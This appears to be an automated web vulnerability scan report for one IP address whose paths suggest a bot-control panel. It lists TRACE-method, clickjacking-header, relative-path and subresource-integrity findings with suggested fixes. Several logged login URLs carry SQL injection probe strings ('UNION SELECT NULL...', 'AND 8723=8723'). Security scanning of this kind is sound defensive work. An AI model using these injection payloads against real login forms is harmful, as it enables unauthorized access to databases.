Evidence Nj92eLAdIMOu1a1J1nhSU8MoWEv1GGKjJV3enFIL
Request Header - size: 265 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 243 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence vLCI3cvW49VelI3bNvMIOkfci4SJExoKIVtZTSp2
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence xWkw2N5KYFjRksznXQDjsHTNOr0XJnCRjw7Br7iF
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/robots.txt
Method TRACE
Parameter
Attack
Evidence zfOmljZ7hE3MCVtPxWKiQiAShby632L2FqF7SacB
Request Header - size: 227 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 205 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence 7wbvWpdKReOt1CwNhnbNMqNNe5Odm5jF4YQD6RAJ
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence ePKPD4fYx8vNIJzgW5AVY6GGFPJXW6o6dlNR8duM
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence NKZHj7JrDHQkbK62VNKSjdsYd22qE8B5OoKKOzrb
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence yHPdmiMmb4ZM2EyI0DUGhIs2EkL99xpR42mf9Dri
Request Header - size: 266 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 244 bytes.
URL http://142.202.242.172/sitemap.xml
Method TRACE
Parameter
Attack
Evidence zY38n5jdV8jyhqnQj8pstpF9KYyOvUzcHBsKfRBN
Request Header - size: 228 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 206 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence f84PI1L5YaW1q5RmI33Au6e9s06cN4rolKrCprpe
Request Header - size: 220 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 198 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence jZ7raYfnoZsXYdbjGF4htSJv7hY8ysNyFxJlknM4
Request Header - size: 220 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 198 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence sSnqJWst8ZBrwqsK6WHbd6nRkMbV3mUtVs3MpYlX
Request Header - size: 419 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 397 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence TrsK52ivqavAD9zRC2XUrtS6DTMYXqxHfAgf5aFJ
Request Header - size: 754 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 732 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method TRACE
Parameter
Attack
Evidence XgBlQ07DGPLWIHvhAwJCDkweVKwXDt7Mll9rFacZ
Request Header - size: 716 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 694 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method TRACE
Parameter
Attack
Evidence Dwry1geRJTF3mh09e4XHs2LmioCCOxUun73gUuFX
Request Header - size: 287 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 265 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method TRACE
Parameter
Attack
Evidence 8oyDtuUEBbp9LtiJGWWuiLurQXqPIaSrQlWajivU
Request Header - size: 489 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 467 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence X2FQFq6CA5Ia4Xw8onKuA6gFBjBLt857Z50AlOTk
Request Header - size: 499 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 477 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method TRACE
Parameter
Attack
Evidence F8MRAivj25dUIPDG4pjc5Rdc10wXRglIQoZZYsw4
Request Header - size: 809 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 787 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence 5HfloJwuc2DaTWjCSW9nOHn3YPdE7ewAvUEbaIE9
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence 9zw2FMrH49QmlGcFdIL8gZP9MacdNoAnXpMmFdkb
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence DBo7I0ZXAFy3JoeonIzkf7EB3phQc1wVLOeSNrzm
Request Header - size: 259 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 237 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence nAcf53rC2yfqA5kAWGBySxLbF9qhoJqwZ4yAucFw
Request Header - size: 724 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 702 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence S19UwCgu7Mr0k4YnilTm4OppshKHU5VJTFHGEVqQ
Request Header - size: 259 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 237 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence sY5pFoRk0sa5ZAh40ycdmQSLrvSrRjD6yRj5rsJ9
Request Header - size: 433 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 411 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method TRACE
Parameter
Attack
Evidence zZcAsiirSXlVb8NLVgShbWCXUwzVuCussEXuZXU0
Request Header - size: 686 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 664 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method TRACE
Parameter
Attack
Evidence KEJ81tp5GME5lfgQiq5qwDsRYhplVT26plhRG1su
Request Header - size: 519 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 497 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence 7nm2yAFkrxrd6VV8Jd6mtN3dSD8VI3oNX9iEXamB
Request Header - size: 261 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 239 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence FDyue4q9h5tyCY5JMCWwHqspRpSy3lH6A1zcVObm
Request Header - size: 223 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 201 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence JEwMPGWAXW2IE5GZlKcJ1RhqQ3qCKK5sQEm3Lue5
Request Header - size: 223 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 201 bytes.
URL http://142.202.242.172/xampp/
Method TRACE
Parameter
Attack
Evidence LBrokDjPF0IszhEGAXDeXDN6XQfKwBv9yprRBIS5
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 235 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method TRACE
Parameter
Attack
Evidence bD0UyfBfsngNxWzghbP7PWI961wxOcd85lsCC898
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence a4v4RE18hWMMDo3tEL8Fr4BgGs7To8MqVbJq8lnR
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence dGdkh03auMzlxZXcvLVFSsCrdBeLWcdmqqcWoAtw
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method TRACE
Parameter
Attack
Evidence LnCFLO7PLPLgxCOy4xxKbkkWsflWJEM05QiSFOTA
Request Header - size: 317 bytes.
Request Body - size: 0 bytes.
Response Header - size: 159 bytes.
Response Body - size: 295 bytes.
Instances 50
Solution
Disable insecure methods such as TRACK, TRACE, and CONNECT on the web server, and ensure that the underlying service implementation does not support insecure methods.
Reference https://cwe.mitre.org/data/definitions/205.html
Tags OWASP_2021_A05
WSTG-v42-CONF-06
OWASP_2017_A06
CWE Id 200
WASC Id 45
Plugin Id 90028
Medium
Missing Anti-clickjacking Header
Description
The response does not include either Content-Security-Policy with 'frame-ancestors' directive or X-Frame-Options to protect against 'ClickJacking' attacks.
URL http://142.202.242.172
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter x-frame-options
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
Instances 27
Solution
Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.

If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
Tags OWASP_2021_A05
WSTG-v42-CLNT-09
OWASP_2017_A06
CWE Id 1021
WASC Id 15
Plugin Id 10020
Medium
Relative Path Confusion
Description
The web server is configured to serve responses to ambiguous URLs in a manner that is likely to lead to confusion about the correct "relative path" for the URL. Resources (CSS, images, etc.) are also specified in the page response using relative, rather than absolute URLs. In an attack, if the web browser parses the "cross-content" response in a permissive manner, or can be tricked into permissively parsing the "cross-content" response, using techniques such as framing, then the web browser may be fooled into interpreting HTML as CSS (or other content types), leading to an XSS vulnerability.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Evidence <img src="Capture.PNG" alt="Logo">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
Instances 1
Solution
Web servers and frameworks should be updated to be configured to not serve responses to ambiguous URLs in such a way that the relative path of such URLs could be mis-interpreted by components on either the client side, or server side.

Within the application, the correct use of the "<base>" HTML tag in the HTTP response will unambiguously specify the base URL for all relative URLs in the document.

Use the "Content-Type" HTTP response header to make it harder for the attacker to force the web browser to mis-interpret the content type of the response.

Use the "X-Content-Type-Options: nosniff" HTTP response header to prevent the web browser from "sniffing" the content type of the response.

Use a modern DOCTYPE such as "<!doctype html>" to prevent the page from being rendered in the web browser using "Quirks Mode", since this results in the content type being ignored by the web browser.

Specify the "X-Frame-Options" HTTP response header to prevent Quirks Mode from being enabled in the web browser using framing attacks.
Reference https://arxiv.org/abs/1811.00917
https://hsivonen.fi/doctype/
https://www.w3schools.com/tags/tag_base.asp
Tags OWASP_2021_A05
OWASP_2017_A06
CWE Id 20
WASC Id 20
Plugin Id 10051
Medium
Sub Resource Integrity Attribute Missing
Description
The integrity attribute is missing on a script or link tag served by an external server. The integrity tag prevents an attacker who have gained access to this server from injecting a malicious content.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdn.jsdelivr.net/npm/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/chart.js"></script>
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter
Attack
Evidence <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/css/all.min.css" rel="stylesheet">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW&username=RawPHP%2522%2529+AND+8723%253D8723%252516&password=%2527UNION+SELECT+NULL%252CNULL%252CNULL+--+-+--+-&secret=LNQ3Bj9ApCtipW5UD0Mh8tBChlT5x3xeXS7IAWL74FJPD4L1Cd
Method GET
Parameter
Attack
Evidence <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.1/dist/umd/popper.min.js"></script>
Request Header - size: 1,173 bytes.
Request Body - size: 0 bytes.
Response Header - size: 219 bytes.
Response Body - size: 3,435 bytes.
